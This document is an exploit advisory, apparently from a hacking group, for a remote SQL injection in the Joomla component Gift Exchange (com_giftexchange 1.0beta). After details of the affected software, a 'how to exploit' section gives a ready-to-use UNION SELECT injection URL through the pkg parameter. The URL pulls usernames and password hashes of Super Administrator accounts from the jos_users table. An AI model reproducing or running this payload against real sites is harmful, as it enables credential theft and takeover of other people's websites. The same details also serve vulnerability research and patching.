38 lines
No EOL
1.6 KiB
Text
38 lines
No EOL
1.6 KiB
Text
---------------------------------------------------------------------------------
|
|
joomla component Gift Exchange com_giftexchange (pkg) Remote Sql Injection
|
|
---------------------------------------------------------------------------------
|
|
|
|
Author : Chip D3 Bi0s
|
|
Group : LatinHackTeam
|
|
Email & msn : chipdebios[alt+64]gmail.com
|
|
Date : 20 March 2010
|
|
Critical Lvl : Moderate
|
|
Impact : Exposure of sensitive information
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
|
|
Application : Gift Exchange
|
|
version : 1.0beta
|
|
Developer : Socialable Studios
|
|
Website : http://extensions.joomla.org/extensions/communities-a-groupware/membership/11680/visit
|
|
License : GPL type : Commercial
|
|
price : $25.00 :)
|
|
Date Added : 20 March 2010
|
|
|
|
Download : http://socialables.com/index.php?option=com_virtuemart&Itemid=91&category_id=28&flypage=flypage.tpl〈=en&page=shop.product_details&product_id=79&vmcchk=1&Itemid=91
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
how to exploit
|
|
|
|
http://192.168.0.1/index.php?option=com_giftexchange&view=showcase&aj=package&pkg=-1union%20select%201,2,3,4,5,concat_ws(0x3a,username,password)chipD3Bi0s,1,1,1,1,1,1,1,1,1+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72+and+0x41646D696E6973747261746F72--
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++ |